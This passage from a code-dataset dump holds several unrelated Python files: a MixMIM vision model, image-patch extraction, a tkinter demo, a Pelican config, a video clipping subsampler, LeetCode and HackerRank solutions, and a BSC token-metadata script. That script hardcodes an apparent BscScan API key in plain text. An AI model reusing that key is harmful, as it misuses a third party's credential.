8\n\n seq_l = out_H * out_W\n # 
use a shared mask for a batch images\n mask = torch.zeros([1, 1, seq_l], device=x.device)\n\n mask_ratio = mask_ratio + random.uniform(0.0, self.range_mask_ratio)\n noise = torch.rand(1, 1, seq_l, device=x.device) # noise in [0, 1]\n # ascend: small is keep, large is remove\n mask_idx = torch.argsort(noise, dim=2)[:, :, :int(seq_l * mask_ratio)]\n mask.scatter_(2, mask_idx, 1)\n mask = mask.reshape(1, 1, out_H, out_W)\n mask_s1 = torch.nn.functional.interpolate(mask, size=(s1_H, s1_W), mode='nearest')\n mask_s2 = torch.nn.functional.interpolate(mask, size=(s2_H, s2_W), mode='nearest')\n mask_s3 = torch.nn.functional.interpolate(mask, size=(s3_H, s3_W), mode='nearest')\n\n mask = mask.reshape(1, out_H * out_W, 1).contiguous()\n mask_s1 = mask_s1.reshape(1, s1_H * s1_W, 1).contiguous()\n mask_s2 = mask_s2.reshape(1, s2_H * s2_W, 1).contiguous()\n mask_s3 = mask_s3.reshape(1, s3_H * s3_W, 1).contiguous()\n\n return mask_s1, mask_s2, mask_s3, mask\n\n def patchify(self, imgs):\n \"\"\"\n imgs: (N, 3, H, W)\n x: (N, L, patch_size**2 *3)\n \"\"\"\n p = self.encoder_stride\n assert imgs.shape[2] == imgs.shape[3] and imgs.shape[2] % p == 0\n\n h = w = imgs.shape[2] // p\n x = imgs.reshape(shape=(imgs.shape[0], 3, h, p, w, p))\n x = torch.einsum('nchpwq->nhwpqc', x)\n x = x.reshape(shape=(imgs.shape[0], h * w, p**2 * 3))\n return x\n\n def unpatchify(self, x):\n \"\"\"\n x: (N, L, patch_size**2 *3)\n imgs: (N, 3, H, W)\n \"\"\"\n p = self.encoder_stride\n h = w = int(x.shape[1]**.5)\n assert h * w == x.shape[1]\n\n x = x.reshape(shape=(x.shape[0], h, w, p, p, 3))\n x = torch.einsum('nhwpqc->nchpwq', x)\n imgs = x.reshape(shape=(x.shape[0], 3, h * p, h * p))\n return imgs\n\n def forward_encoder(self, x, mask_s1, mask_s2, mask_s3, mask_s4):\n x = self.patch_embed(x)\n\n B, L, _ = x.shape\n H = W = int(L ** 0.5)\n\n x = x * (1. 
- mask_s1) + x.flip(0) * mask_s1\n x = x + self.absolute_pos_embed\n x = self.pos_drop(x)\n\n for idx, layer in enumerate(self.layers):\n if idx == 0:\n x = layer(x, attn_mask=mask_s1)\n elif idx == 1:\n x = layer(x, attn_mask=mask_s2)\n elif idx == 2:\n x = layer(x, attn_mask=mask_s3)\n elif idx == 3:\n x = layer(x, attn_mask=mask_s4)\n x = self.norm(x)\n\n return x\n\n def forward_decoder(self, x, mask):\n # embed tokens\n x = self.decoder_embed(x)\n B, L, C = x.shape\n\n mask_tokens = self.mask_token.expand(B, L, -1)\n x1 = x * (1 - mask) + mask_tokens * mask\n x2 = x * mask + mask_tokens * (1 - mask)\n x = torch.cat([x1, x2], dim=0)\n\n # add pos embed\n x = x + self.decoder_pos_embed\n\n # apply Transformer blocks\n for idx, blk in enumerate(self.decoder_blocks):\n x = blk(x)\n x = self.decoder_norm(x)\n\n # predictor projection\n x = self.decoder_pred(x)\n\n return x\n\n def forward_loss(self, x, x_rec, mask):\n B, L, C = x_rec.shape\n\n # unmix tokens\n x1_rec = x_rec[:B//2]\n x2_rec = x_rec[B//2:]\n\n target = self.patchify(x)\n if self.norm_pix_loss:\n mean = target.mean(dim=-1, keepdim=True)\n var = target.var(dim=-1, keepdim=True)\n target = (target - mean) / (var + 1.e-6)**.5\n\n unmix_x_rec = x1_rec * mask + x2_rec.flip(0) * (1 - mask)\n loss_rec = (unmix_x_rec - target) ** 2\n loss_rec = loss_rec.mean()\n\n return loss_rec\n\n def forward(self, x, mask_ratio=0.5):\n\n mask_s1, mask_s2, mask_s3, mask_s4 = self.random_masking(x, mask_ratio)\n z = self.forward_encoder(x, mask_s1, mask_s2, mask_s3, mask_s4)\n x_rec = self.forward_decoder(z, mask_s4)\n loss = self.forward_loss(x, x_rec, mask_s4)\n return loss, x_rec, mask_s4\n\n @torch.jit.ignore\n def no_weight_decay(self):\n return {'mask_token'}\n\n\n@register_model\ndef mixmim_base(**kwargs):\n default_args = dict(\n img_size=224, patch_size=4, in_chans=3, num_classes=0,\n embed_dim=128, depths=[2, 2, 18, 2], num_heads=[4, 8, 16, 32],\n window_size=[14, 14, 14, 7], mlp_ratio=4, qkv_bias=True, qk_scale=None,\n drop_rate=0.0, drop_path_rate=0.0, \n patch_norm=True, use_checkpoint=False,\n decoder_dim=512, decoder_depth=8, decoder_num_heads=16,\n )\n default_args.update(**kwargs)\n model = MixMIM(**default_args)\n\n return model\n\n\n@register_model\ndef mixmim_large(**kwargs):\n default_args = dict(\n img_size=224, patch_size=4, in_chans=3, num_classes=0,\n embed_dim=192, depths=[2, 2, 18, 2], num_heads=[6, 12, 24, 48],\n window_size=[14, 14, 14, 7], mlp_ratio=4, qkv_bias=True, qk_scale=None,\n drop_rate=0.0, drop_path_rate=0.0, \n patch_norm=True, use_checkpoint=False,\n decoder_dim=512, decoder_depth=8, decoder_num_heads=16,\n )\n default_args.update(**kwargs)\n model = MixMIM(**default_args)\n\n return model\n\n\n@register_model\ndef mixmim_huge(**kwargs):\n default_args = dict(\n img_size=224, patch_size=4, in_chans=3, num_classes=0,\n embed_dim=352, depths=[2, 2, 18, 2], num_heads=[11, 22, 44, 88],\n window_size=[14, 14, 14, 7], mlp_ratio=4, qkv_bias=True, qk_scale=None,\n drop_rate=0.0, drop_path_rate=0.0, \n patch_norm=True, use_checkpoint=False,\n decoder_dim=512, decoder_depth=8, decoder_num_heads=16,\n )\n default_args.update(**kwargs)\n model = MixMIM(**default_args)\n\n return model\n","repo_name":"Sense-X/MixMIM","sub_path":"models_mixmim.py","file_name":"models_mixmim.py","file_ext":"py","file_size_in_byte":18669,"program_lang":"python","lang":"en","doc_type":"code","stars":112,"dataset":"github-code","pt":"54"} +{"seq_id":"37302505773","text":"'''\r\nCreated on 27-Dec-2019\r\n\r\n@author: E75337\r\n'''\r\n\r\n# 
data_path = 'D:/MoNuSAC_images_and_annotations/resize_images/'\r\n# label_path= 'D:/MoNuSAC_images_and_annotations/resize_images/resize_label/'\r\n# path2write_label= 'D:/MoNuSAC_images_and_annotations/resize_images/resize_label/patch_label/'\r\n# path2write_img= 'D:/MoNuSAC_images_and_annotations/resize_images/resize_label/patches/'\r\n\r\ndata_path = 'Z:/Ravi K/Other/ISBI_2019_challenge/iChallenge_AMD/Task_3/New_data/exudates/images/val/data/'\r\nlabel_path = 'Z:/Ravi K/Other/ISBI_2019_challenge/iChallenge_AMD/Task_3/New_data/exudates/images/val/mask/'\r\n\r\n# data_path = 'Z:/Ravi K/Other/ISBI_2019_challenge/iChallenge_AMD/Task_3/Data/Processed/images/training/scar/'\r\n# label_path = 'Z:/Ravi K/Other/ISBI_2019_challenge/iChallenge_AMD/Task_3/Data/Processed/masks/training/scar/'\r\n\r\npath2write_img= 'Z:/Ravi K/Other/ISBI_2019_challenge/iChallenge_AMD/Task_3/New_data/exudates/patches/val/data/'\r\npath2write_label= 'Z:/Ravi K/Other/ISBI_2019_challenge/iChallenge_AMD/Task_3/New_data/exudates/patches/val/mask/'\r\n\r\n# path2write='Z:/Ravi K/Other/ISBI_2019_challenge/iChallenge_AMD/Task_3/Data/Processed/Patches/binary_class/exudate/'\r\n\r\ndata_extention='.jpg'\r\nlabel_extention='.png'\r\nimport math\r\nimport os\r\nimport glob \r\nimport cv2\r\nimport numpy as np\r\n# os.makedirs(path2write_label)\r\n# os.makedirs(path2write_img)\r\n# height=512\r\n# width=512\r\nclasses=2\r\ndef binarylabel(im_label,width,height):\r\n im_label=im_label.astype('uint8')\r\n lab=np.zeros([width,height,classes],dtype=\"uint8\")\r\n for i in range(width):\r\n for j in range(height):\r\n lab[i,j,im_label[i][j]]=1\r\n return lab\r\ndata=[] \r\nlabel=[]\r\nw=[]\r\nh=[]\r\nfor filename in glob.glob(label_path+'*'+label_extention):\r\n #print(filename)\r\n # Read the label data \r\n print(filename)\r\n pat= filename.split(label_extention)[0]\r\n im_label = cv2.imread(filename,0)\r\n print(np.unique(im_label))\r\n \r\n pat1=pat.split(\"\\\\\")[-1]\r\n im = cv2.imread(data_path+pat1+data_extention)\r\n \r\n in_ = np.array(im_label, dtype=np.float32)\r\n width, height = in_.shape;\r\n tileSize = 512.0\r\n rloop = int(math.ceil(width/tileSize))\r\n cloop = int(math.ceil(height/tileSize))\r\n out_ = np.zeros((width,height),dtype=np.float32)\r\n# out_ = np.ones((width,height),dtype=np.float32)\r\n out_ = out_*255\r\n for i in range(rloop):\r\n for j in range(cloop):\r\n step_i = min(int(tileSize),width-i*int(tileSize))\r\n step_j = min(int(tileSize),height-j*int(tileSize))\r\n in_1 = np.zeros((int(tileSize),int(tileSize)),dtype=np.float32)\r\n in_im = np.zeros((int(tileSize),int(tileSize),3),dtype=np.float32)\r\n in_1[0:step_i,0:step_j] = in_[i*int(tileSize):i*int(tileSize)+step_i,j*int(tileSize):j*int(tileSize)+step_j]\r\n cv2.imwrite(path2write_label+pat1+'_'+str(i)+'_'+str(j)+'.png',in_1.astype('uint8'))\r\n \r\n in_im[0:step_i,0:step_j,:] = im[i*int(tileSize):i*int(tileSize)+step_i,j*int(tileSize):j*int(tileSize)+step_j,:]\r\n cv2.imwrite(path2write_img+pat1+'_'+str(i)+'_'+str(j)+'.jpg',in_im.astype('uint8'))\r\n \r\n# b_ch=104.00699\r\n# g_ch=116.66877\r\n# r_ch=122.67892\r\n# \r\n# im_ = in_im.astype(\"float32\")\r\n# #Individual channel-wise mean substraction\r\n# im_ -= np.array((b_ch,g_ch,r_ch))\r\n# \r\n# \r\n# # # # Compute standard deviation\r\n# # b_ch=np.std(im[:,:,0])\r\n# # g_ch=np.std(im[:,:,1])\r\n# # r_ch=np.std(im[:,:,2])\r\n# # \r\n# # #Individual channel-wise standard deviation division\r\n# # im_ /= np.array((b_ch,g_ch,r_ch))\r\n# \r\n# \r\n# #Append Images into corresponding List\r\n# 
data.append(np.rollaxis((im_),2)) \r\n# #Convert label into binary form\r\n# # lab = binarylabel(in_1,width,height)\r\n# # in_1= np.where(in_1<4,0,in_1)\r\n# # in_1= np.where(in_1>4,0,in_1)\r\n# # print(np.unique(in_1))\r\n# # in_1= np.where(in_1==255,1,in_1)\r\n# print(np.unique(in_1))\r\n# lab = binarylabel(in_1,1024,1024)\r\n# \r\n# #Append Images into corresponding List\r\n# label.append(((lab)))\r\n \r\n# print('\\n'+tile_name[-1])\r\n# else:\r\n# print(\"error: \"+tile_name[-1])\r\n \r\n \r\n# np.save(path2write+data_fileName,np.array(data))\r\n# np.save(path2write+label_fileName,np.array(label)) \r\n\r\n# cv2.imwrite(pat+'.png',51*im_label)\r\n# print(np.unique(im_label))\r\n# w.append(im_label.shape[0]) \r\n# h.append(im_label.shape[1])\r\n# print(min(w),'and', min(h))\r\n# print(max(w),'and', max(h))\r\n\r\n\r\n","repo_name":"Ravimk07/Retinal-Image-Analysis","sub_path":"Extract_patches_R.py","file_name":"Extract_patches_R.py","file_ext":"py","file_size_in_byte":4892,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"31541461955","text":"from tkinter import *\r\n\r\ndef on():\r\n print(\"On\")\r\n return\r\n\r\nroot = Tk()\r\n\r\nroot.geometry(\"600x300\")\r\nroot.minsize(600,300)\r\nroot.maxsize(600,300)\r\n\r\nf1 = Frame(root, bg = \"grey\", padx = 40, pady = 40, \r\nborderwidth = 5, relief = RIDGE)\r\nf1.pack(side = LEFT,fill = BOTH)\r\nb1 = Button(f1, bg = \"#3586c4\", text = \"Bulb1\", command = on)\r\nb1.pack(side = TOP)\r\n\r\nf2 = Frame(root, bg = \"grey\", padx = 40, pady = 40, \r\nborderwidth = 5, relief = RIDGE)\r\nf2.pack(side = LEFT,fill = BOTH)\r\nb2 = Button(f2, bg = \"#3586c4\", text = \"Bulb2\", command = on)\r\nb2.pack(side = BOTTOM, fill = BOTH)\r\n\r\nf3 = Frame(root, bg = \"grey\", padx = 40, pady = 40, \r\nborderwidth = 5, relief = RIDGE)\r\nf3.pack(side = LEFT,fill = BOTH)\r\nb3 = Button(f3, bg = \"#3586c4\", text = \"Bulb3\", command = on)\r\nb3.pack(side = TOP)\r\n\r\nf4 = Frame(root, bg = \"grey\", padx = 40, pady = 40, \r\nborderwidth = 5, relief = RIDGE)\r\nf4.pack(side = LEFT, fill = BOTH)\r\nb4 = Button(f4, bg = \"#3586c4\", text = \"Bulb4\", command = on)\r\nb4.pack(side = TOP)\r\nroot.mainloop()","repo_name":"aiyush/TkinterApps","sub_path":"tut5buttons.py","file_name":"tut5buttons.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"29284912291","text":"import markdown\n\nAUTHOR = \"Charles Monod-Broca\"\nSITENAME = \"Let's tame that python together\"\n\nPATH = \"content\"\n\nTHEME = \"pelican-clean-blog\"\n\nTIMEZONE = \"Europe/Paris\"\n\nDEFAULT_LANG = \"fr\"\n\n# Feed generation is usually not desired when developing\nFEED_ALL_ATOM = None\nCATEGORY_FEED_ATOM = None\nTRANSLATION_FEED_ATOM = None\nAUTHOR_FEED_ATOM = None\nAUTHOR_FEED_RSS = None\n\n\n# Blogroll\nLINKS = (\n (\"Pelican\", \"https://getpelican.com/\"),\n (\"Python.org\", \"https://www.python.org/\"),\n (\"Jinja2\", \"https://palletsprojects.com/p/jinja/\"),\n (\"You can modify those links in your config file\", \"#\"),\n)\n\n# Social widget\nSOCIAL = (\n (\"You can add links in your config file\", \"#\"),\n (\"Another social link\", \"#\"),\n)\n\nDEFAULT_PAGINATION = 10\n\n# Uncomment following line if you want document-relative URLs when developing\n# RELATIVE_URLS = True\n\nOUTPUT_PATH = \"docs/\"\n\n# SITEURL = \"https://steampunkislande.github.io\"\nSITEURL = \"\"\n\nMARKDOWN = {\n \"extensions\": [\n 
\"markdown_include.include\",\n \"markdown_link_attr_modifier\",\n \"pymdownx.highlight\",\n \"markdown_fenced_code_tabs\",\n ],\n \"extension_configs\": {\n \"markdown.extensions.codehilite\": {\"css_class\": \"highlight\"},\n \"markdown_link_attr_modifier\": {\n \"new_tab\": \"on\",\n \"no_referrer\": \"external_only\",\n \"auto_title\": \"on\",\n },\n \"markdown_fenced_code_tabs\": {\n \"single_block_as_tab\": False,\n \"active_class\": \"active\",\n \"template\": \"default\",\n },\n },\n \"output_format\": \"html5\",\n}\n","repo_name":"SteampunkIslande/SteampunkIslande.github.io","sub_path":"pelicanconf.py","file_name":"pelicanconf.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"2937443797","text":"\"\"\"\nclipping subsampler turns full videos into clips of videos according to clip_col\n\"\"\"\nimport os\nimport copy\nimport glob\nimport ffmpeg\nimport tempfile\nfrom collections.abc import Iterable\n\nimport datetime\nfrom .subsampler import Subsampler\n\n\ndef _get_seconds(t):\n if not isinstance(t, str):\n return float(t) # already seconds\n time_format = \"%H:%M:%S.%f\" # TODO: maybe parameterize this?\n t_obj = datetime.datetime.strptime(t, time_format).time()\n return t_obj.second + t_obj.microsecond / 1e6 + t_obj.minute * 60 + t_obj.hour * 3600\n\n\ndef _get_strtime(t_sec):\n hour = int(t_sec // 3600)\n minute = int((t_sec // 60) % 60)\n second = int(t_sec % 60)\n # Use round to solve machine error problem (e.g. t_sec=13.6)\n microsecond = round((t_sec - int(t_sec)) * 1000)\n return f\"{hour:02d}:{minute:02d}:{second:02d}.{microsecond:03d}\"\n\n\ndef _split_time_frame(s, e, min_length, max_length):\n \"\"\"Filters out cuts by min and max length\"\"\"\n time_d = e - s\n time_frames = [\n (s + i * max_length, min(s + (i + 1) * max_length, e))\n for i in range(int(time_d // max_length) + (1 if time_d % max_length > 0 else 0))\n ]\n if len(time_frames) == 0:\n return []\n last_time_d = time_frames[-1][1] - time_frames[-1][0]\n time_frames = time_frames if last_time_d >= min_length else time_frames[:-1]\n return time_frames\n\n\ndef _adjust_ranges_to_keyframes(ranges, keyframes):\n \"\"\"Translates ranges into keyframe vocab\"\"\"\n adjusted_ranges = []\n for start, end in ranges:\n keyframes_in_range = [k for k in keyframes if start <= k <= end]\n if keyframes_in_range:\n adjusted_start = min(keyframes_in_range)\n adjusted_end = max(keyframes_in_range)\n if adjusted_start != adjusted_end:\n adjusted_ranges.append((adjusted_start, adjusted_end))\n return adjusted_ranges\n\n\nclass ClippingSubsampler(Subsampler):\n \"\"\"\n Cuts videos up into segments according to the 'clips' metadata\n\n Parameters:\n oom_clip_count: int\n The number of orders of magnitude for clip count, used for formatting clip keys.\n encode_formats: dict\n A dictionary mapping stream keys to their corresponding file extensions, e.g., {\"video\": \"mp4\", \"audio\": \"mp3\"}.\n min_length: float optional (default=0.0)\n Minimum length in seconds of a clip. 
Below this the subsampler will reject the clips\n max_length: float optional (default=999999.0)\n Maximum clip length, if exceeded resolve according to max_length_strategy\n max_length_strategy: str optional (defaul=\"all\")\n \"all\" - cut up long clip into as many clips of max_length as possible\n \"first\" - take the first max_length clip from the long clip\n precision: str, optional (default=\"low\")\n \"low\" - splits can be imprecise in any direction\n \"keyframe_adjusted\" - translates cuts into the vocab of existing keyframes (a good middlepoint)\n useful if you need to do fast clipping but information can't cross cut boundries\n \"exact\" - keyframes are inserted to get exact splits (warning, slow)\n\n expects:\n - clips to be sorted in increasing order and non-overlapping\n - time to be in the format \"%H:%M:%S.%f\", or a number representing the second of the timestamp\n \"\"\"\n\n def __init__(\n self,\n oom_clip_count,\n encode_formats,\n min_length=0.0,\n max_length=999999.0,\n max_length_strategy=\"all\",\n precision=\"low\",\n ):\n self.oom_clip_count = oom_clip_count\n self.encode_formats = encode_formats\n self.min_length = min_length\n self.max_length, self.max_length_strategy = max_length, max_length_strategy\n assert precision in [\"exact\", \"low\", \"keyframe_adjusted\"]\n self.precision = precision\n\n def __call__(self, streams, metadata):\n clips = metadata.pop(\"clips\")\n\n if not isinstance(clips[0], Iterable): # make sure clips looks like [[start, end]] and not [start, end]\n clips = [clips]\n\n is_strtime = isinstance(clips[0][0], str)\n\n if self.precision == \"keyframe_adjusted\":\n # TODO: make it so if not present, get it yourself\n keyframe_timestamps = metadata[\"video_metadata\"].pop(\"keyframe_timestamps\")\n s_clips = [[_get_seconds(s), _get_seconds(e)] for (s, e) in clips]\n clips = _adjust_ranges_to_keyframes(s_clips, keyframe_timestamps)\n\n filtered_clips = []\n for s, e in clips:\n max_len_clips = _split_time_frame(_get_seconds(s), _get_seconds(e), self.min_length, self.max_length)\n\n if self.max_length_strategy == \"first\":\n max_len_clips = max_len_clips[:1]\n\n filtered_clips += max_len_clips\n clips = filtered_clips\n\n if len(clips) == 0:\n # return an error\n return {}, [], f\"Video had no clips longer than {self.min_length}\"\n\n start_0 = _get_seconds(clips[0][0]) == 0.0\n\n ind = 1 + int(not start_0)\n s_p, e_p = clips[0]\n s_p, e_p = _get_seconds(s_p), _get_seconds(e_p)\n splits = (not start_0) * [s_p] + [e_p]\n # list of indicies of clips to take, used to discard non-contiguous sections\n take_inds = [int(not start_0)]\n\n # TODO: make nicer\n for s, e in clips[1:]:\n s, e = _get_seconds(s), _get_seconds(e)\n\n if s == e_p: # situations like [0, 1], [1, 2], [2, 3] -> 1, 2\n splits += [e]\n take_inds.append(ind)\n ind += 1\n else:\n splits += [s, e]\n take_inds.append(ind + 1)\n ind += 2\n e_p = e\n\n segment_times = \",\".join([str(spl) for spl in splits])\n streams_clips = {}\n\n for k in streams.keys():\n stream_bytes = streams[k][0] # pre-broadcast so only one\n if stream_bytes is None:\n continue\n encode_format = self.encode_formats[k]\n\n with tempfile.TemporaryDirectory() as tmpdir:\n # TODO: we need to put the extension into the metadata\n # TODO: This can be done better using pipes I just don't feel like sinking too much time into this rn\n with open(os.path.join(tmpdir, f\"input.{encode_format}\"), \"wb\") as f:\n f.write(stream_bytes)\n try:\n kwargs = {\n \"map\": 0,\n \"f\": \"segment\",\n \"segment_times\": 
segment_times,\n \"reset_timestamps\": 1,\n }\n\n # Precision things, tradeoff for speed\n if self.precision != \"exact\":\n kwargs[\"c\"] = \"copy\"\n else:\n kwargs[\"force_key_frames\"] = segment_times\n\n _ = (\n ffmpeg.input(f\"{tmpdir}/input.{encode_format}\")\n .output(f\"{tmpdir}/clip_%d.{encode_format}\", **kwargs)\n .run(capture_stdout=True, quiet=True)\n )\n\n except Exception as err: # pylint: disable=broad-except\n return {}, [], str(err)\n\n stream_clips = glob.glob(f\"{tmpdir}/clip*.{encode_format}\")\n stream_clips.sort(key=lambda x: int(x.split(\"_\")[-1].split(\".\")[0]))\n\n correct_clips = []\n for clip_id, (clip, ind) in enumerate(zip(clips, take_inds)):\n if ind < len(stream_clips):\n correct_clips.append((clip_id, clip, stream_clips[ind]))\n # clips_lost = len(take_inds) - len(correct_clips) # TODO report this somehow\n\n stream_clips, metadata_clips = [], []\n for clip_id, clip_span, clip_pth in correct_clips:\n with open(clip_pth, \"rb\") as vid_f:\n clip_bytes = vid_f.read()\n stream_clips.append(clip_bytes)\n\n clip_key = \"{clip_id:0{oom_clip_count}d}\".format( # pylint: disable=consider-using-f-string\n clip_id=clip_id, oom_clip_count=self.oom_clip_count\n )\n meta_clip = copy.deepcopy(metadata)\n # set the timeframe of this clip\n if is_strtime:\n # Keep clips in the original format to be compatible with the data schema.\n meta_clip[\"clips\"] = [(_get_strtime(clip_span[0]), _get_strtime(clip_span[1]))]\n else:\n meta_clip[\"clips\"] = [clip_span]\n meta_clip[\"key\"] = f\"{meta_clip['key']}_{clip_key}\"\n\n yt_md_dict = meta_clip.get(\"yt_meta_dict\", {})\n if (yt_md_dict is not None) and (yt_md_dict.get(\"subtitles\", None) is not None):\n clip_subtitles = []\n s_c, e_c = _get_seconds(clip_span[0]), _get_seconds(clip_span[1])\n for line in meta_clip[\"yt_meta_dict\"][\"subtitles\"]:\n s, e = _get_seconds(line[\"start\"]), _get_seconds(line[\"end\"])\n if max(s_c, s) < min(e_c, e):\n clip_subtitles.append(line)\n elif s > e_c:\n break\n # full video subtitles might still be useful for context\n meta_clip[\"clip_subtitles\"] = clip_subtitles\n\n metadata_clips.append(meta_clip)\n\n streams_clips[k] = stream_clips\n\n return streams_clips, metadata_clips, None\n","repo_name":"iejMac/video2dataset","sub_path":"video2dataset/subsamplers/clipping_subsampler.py","file_name":"clipping_subsampler.py","file_ext":"py","file_size_in_byte":9735,"program_lang":"python","lang":"en","doc_type":"code","stars":332,"dataset":"github-code","pt":"54"} +{"seq_id":"74373125920","text":"import sys\nimport requests\nimport datetime\n\nsys.path.append('./get_info_api')\nimport moralis\nsys.path.append('./')\nimport crawl_data_api.crawl_from_bsc_token as crawl\n\nBSC_KEY = 'EV41IX58376FTWQM37PW9T3ADJV18HSPZN'\n\n# get total supply of token by ContractAddress\ndef get_total_supply(contract_address: str):\n url = 'https://api.bscscan.com/api?module=stats&action=tokensupply&contractaddress=' +\\\n contract_address + '&apikey=' + BSC_KEY\n \n data = requests.get(url).json()['result']\n try:\n rs = int(data)\n except ValueError:\n rs = 0\n return rs\n\n# get total circulating supply \n# -> the numbers of cryptocurrencies coins publicly available in the market\ndef get_total_circulating_supply(contract_address: str):\n url = 'https://api.bscscan.com/api?module=stats&\\\n action=tokenCsupply&contractaddress=' +\\\n contract_address + '&apikey=' + BSC_KEY\n \n data = requests.get(url).json()['result']\n return int(data)\n\n\n# get token account balance from token address & account 
address\ndef get_account_balance(token_address: str, account_address: str):\n url = 'https://api.bscscan.com/api?module=account&action=tokenbalance' +\\\n '&contractaddress=' + token_address + '&address=' + account_address +\\\n '&tag=latest&apikey=' + BSC_KEY\n \n data = requests.get(url).json()['result']\n return int(data)\n\n\n# get a list of normal transaction by address\n# contain timestamp, [blocknumber, hash, nonce, blockHash, transactionindex]\n# from - to - value - gas - gas price - isError\n# contractAddress - cumulativeGasUsed\n\ndef get_list_transactions(address: str):\n url = 'https://api.bscscan.com/api?module=account&action=txlist&address=' +\\\n address + '&startblock=0&endblock=99999999&page=1&offset=10&sort=asc&' +\\\n 'apikey=' + BSC_KEY\n \n data = requests.get(url).json()['result']\n result = []\n for transaction in data:\n time = datetime.utcfromtimestamp(int(transaction['timeStamp'])) \\\n .strftime('%Y-%m-%d %H:%M:%S')\n sender = transaction['from']\n receiver = transaction['to']\n value = int(transaction['value']) / 10**18\n result.append((time, sender, receiver, value))\n \n return result\n\n# get infor about the creator of the token\ndef get_creator_of_token(address: str):\n transaction = get_list_transactions(address)[-1]\n (time, creator, _, _) = transaction\n explain = \"Token Address: \" + address + \"\\nCreator: \" + creator + \"\\n\" +\\\n \"Time create: \"+ time \n \n return (explain, creator)\n\n# get the liquidity of the token by USD or BNB\ndef get_liquidity_of_token(token: str):\n url = 'https://api.pancakeswap.info/api/v2/tokens/' + token\n response = requests.get(url).json()\n try:\n data = response['data']\n price_USD = data['price']\n except:\n return 0\n return float(price_USD)\n\n# get contract abi if the contract is verified\ndef get_contract_abi(token_address: str):\n url = 'https://api.bscscan.com/api?module=contract&action=getabi' \\\n + '&address=%s&apikey=%s' % (token_address, BSC_KEY)\n response = requests.get(url=url).json()\n if response['status'] == '0':\n return None\n return response['result']\n\n# call this function for more infomation about the BSC token\ndef get_more_info_from_bsc(token_address: str):\n total_supply = get_total_supply(token_address)\n circulating_supply = get_total_circulating_supply(token_address)\n liquidity = get_liquidity_of_token(token_address)\n\n contract_abi = get_contract_abi(token_address)\n if contract_abi is None:\n token_owner = None\n else:\n token_owner = moralis.call_contract_function(\n token_address, 'owner', contract_abi, 1)\n if token_owner is None:\n token_owner = moralis.call_contract_function(\n token_address, 'getOwner', contract_abi, 1)\n if token_owner is None:\n token_owner = crawl.get_owner_of_token(token_address)\n\n return (total_supply, circulating_supply, liquidity, token_owner, contract_abi)\n {\n \"total_supply\": total_supply,\n \"circulating_supply\": circulating_supply,\n \"liquidity\": liquidity,\n \"owner\": token_owner,\n \"contract_abi\": contract_abi\n } \n\n","repo_name":"auditrate-tech/detect-scam","sub_path":"get_info_api/metadata_bsc.py","file_name":"metadata_bsc.py","file_ext":"py","file_size_in_byte":4276,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"36108546516","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n# Complete the arrayManipulation function below.\ndef arrayManipulation(n, queries):\n \n arr=n*[0]\n print(arr[n-1])\n max=0\n currentSum=0\n for i in 
range(0,len(queries),1):\n #print(queries[i][0]-1, end=\" \")\n #print(queries[i][1]-1, end=\" \")\n #print(queries[i][2])\n arr[queries[i][0]-1] += queries[i][2] \n if queries[i][1]+1 <= n:\n arr[queries[i][1]] -= queries[i][2] \n \n print(arr) \n for i in range(0,n,1):\n currentSum+=arr[i]\n #print(currentSum, end=\" \")\n #print(max)\n if max < currentSum:\n max=currentSum\n #print(dict)\n #key_max = max(dict.keys(), key=(lambda k: dict[k]))\n #key_min = min(my_dict.keys(), key=(lambda k: my_dict[k]))\n\n return max\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n nm = input().split()\n\n n = int(nm[0])\n\n m = int(nm[1])\n\n queries = []\n\n for _ in range(m):\n queries.append(list(map(int, input().rstrip().split())))\n\n result = arrayManipulation(n, queries)\n\n fptr.write(str(result) + '\\n')\n\n fptr.close()\n","repo_name":"gokadroid/Python3Examples","sub_path":"findMaxSumFromSets.py","file_name":"findMaxSumFromSets.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"35033262186","text":"'''\nGiven the root of a binary tree, return the length of the diameter of the tree.\n\nThe diameter of a binary tree is the length of the longest path between any two\nnodes in a tree. This path may or may not pass through the root.\n\nThe length of a path between two nodes is represented by the number of edges\nbetween them.\n\nConstraints:\nThe number of nodes in the tree is in the range [1, 10^4].\n-100 <= Node.val <= 100\n'''\nfrom typing import Optional\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\nclass Solution:\n # Watched the Youtube video - https://www.youtube.com/watch?v=bkxqA8Rfv04\n # The diameter of a node in a tree = height of left subtree + height of right subtree + 2\n # Time O(n) Space O(h)\n def diameterOfBinaryTree2(self, root: Optional[TreeNode]) -> int:\n res = 0 # res = [0]\n def dfs(root):\n if not root:\n return -1\n left = dfs(root.left)\n right = dfs(root.right)\n nonlocal res # no need if claim res = [0] at first (but may be not a good practice)\n res = max(res, 2+left+right) # res[0] = max(res[0], 2+left+right)\n return 1 + max(left, right)\n dfs(root)\n return res # return res[0]\n\n def diameterOfBinaryTree3(self, root: Optional[TreeNode]) -> int:\n self.diameter = 0 # This works like a \"global\" variable (but not a good practice)\n\n def height(node):\n if not node: return -1\n left, right = height(node.left), height(node.right)\n self.diameter = max(self.diameter, 2+left+right)\n return 1 + max(left, right)\n\n height(root)\n return self.diameter\n\n # The diameter is the maximum of either:\n # Passing through the root (in which case the longest path would be using the maximum depth of left and right child)\n # The diameter of the left child\n # The diameter of the right child\n def diameterOfBinaryTree(self, root):\n return self.diameter_rec(root)[0]\n\n def diameter_rec(self, root):\n if not root:\n return 0, -1\n\n left_diameter, left_height = self.diameter_rec(root.left)\n right_diameter, right_height = self.diameter_rec(root.right)\n return (max(left_diameter, right_diameter, left_height + right_height + 2), max(left_height, right_height) + 1)\n\ndef evaluate(function, tests):\n for test in tests:\n actual = function(**test['Input'])\n expect = test['Output']\n print('Actual 